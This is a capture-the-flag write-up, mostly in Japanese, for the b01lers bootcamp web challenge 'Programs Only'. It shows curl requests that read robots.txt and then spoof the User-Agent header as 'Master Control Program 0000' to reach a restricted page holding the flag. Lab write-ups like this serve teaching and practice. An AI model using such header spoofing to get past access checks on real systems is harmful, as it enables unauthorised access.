b01lers CTF bootcamp - Writeup (web : Programs Only)
Web
Programs Only!
You don't have to be lonely at Programs Only dot com http://chal.ctf.b01lers.com:3003
指定されたURLへアクセスする。
kali@kali:~/Desktop$ curl http://chal.ctf.b01lers.com:3003/ <!DOCTYPE html> <html lang="en"> <head> <title>Welcome.</title> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="stylesheet" href="/static/css/tron.css" /> <link rel="stylesheet" href="/static/css/style.css" /> </head> <body style="background-color: black"> <div id="main-wrapper"> <div class="content-page"> <div> <h1>Welcome 'curl/7.68.0' to The Grid.</h1> </div> </div> <div class="horizontal_wrapper"> <div> <a href="/tron_city"> <h2>Tron City</h2> <img src="/static/img/tron_city.jpg" alt="tron city" /> </a> </div> <div> <a href="/sea_of_simulation"> <h2>Sea of Simulation</h2> <img src="/static/img/SeaofSim01.webp" alt="sea_of_simulation" /> </a> </div> </div> <div class="horizontal_wrapper"> <div> <a href="/disc_arena"> <h2>Disc Arena</h2> <img src="/static/img/disc_war.png" alt="disc arena" /> <!-- from: https://www.deviantart.com/thepr0crastin80r/art/Tron-Legacy-SFM-Disc-Battle-737958125&psig=AOvVaw3jD_KhH4MDPoqSCBxj_OVH&ust=1600969105064000&source=images&cd=vfe&ved=0CA0QjhxqFwoTCMjv3_Lo_-sCFQAAAAAdAAAAABAD --> </a> </div> <div> <a href="/0001001_club"> <h2>0001001 Club</h2> <img src="/static/img/0001001_Club.webp" alt="0001001 Club" /> </a> </div> </div> <div class="horizontal_wrapper"> <div> <a href="/portal"> <h2>Portal</h2> <img src="/static/img/portal.webp" alt="portal" /> </a> </div> <!-- <div> <a href="/program"> <h2>Program's Only</h2> <img src="/static/img/programs_only.jpg" alt="00101010" /> </a> </div> --> </div> </div> </body> </html>
アクセスしたクライアントのUser-Agentを動的に表示している。
robots.txtを確認すると以下の記載がある。
kali@kali:~/Desktop$ curl http://chal.ctf.b01lers.com:3003/robots.txt User-agent: * Disallow: / User-agent: Program Allow: /program/ User-agent: Master Control Program 0000 Allow: /program/control
robots.txtに記載されたUser-AgentとURLへアクセスするとflagが含まれたサイトが表示される。
kali@kali:~/Desktop$ curl -H "User-Agent: Master Control Program 0000" http://chal.ctf.b01lers.com:3003/program/control <!DOCTYPE html> <html> <head> <title>Master Control.</title> <link rel="stylesheet" href="/static/css/tron.css" /> <link rel="stylesheet" href="/static/css/style.css" /> </head> <body> <div id="main-wrapper"> <div class="content-page"> <div> <h1>Master Control.</h1> </div> <div> <p>flag{who_programmed_you?} </p> </div> </div> </div> </body> </html>